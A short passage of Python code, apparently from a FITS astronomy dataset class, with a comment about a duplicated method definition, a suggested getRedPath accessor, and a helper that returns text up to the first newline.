'_asn.fits' # if not re.search('_asn', i, re.IGNORECASE): # convertCts.convert_fits(self, os.path.join(self.fitsdir, i)) #pdb.set_trace() self._rotateHdr() #AKS
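
# Caveat on the class above: getProdPath is defined twice, so the second
# definition (returning self.reddir) silently shadows the first and the
# Output-directory accessor becomes unreachable. A sketch of the obvious
# disambiguation, with getRedPath as our suggested name for the second:
def getRedPath(self):
    """ return the path of the DataSet's Red directory. """
    return self.reddir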
def _line(buffer):
    # same edge case as _string above: without a trailing newline, find()
    # returns -1 and buffer[:-1] would drop the last character
    end = string.find(buffer, '\n')
    if end == -1:
        return buffer
    return buffer[:end]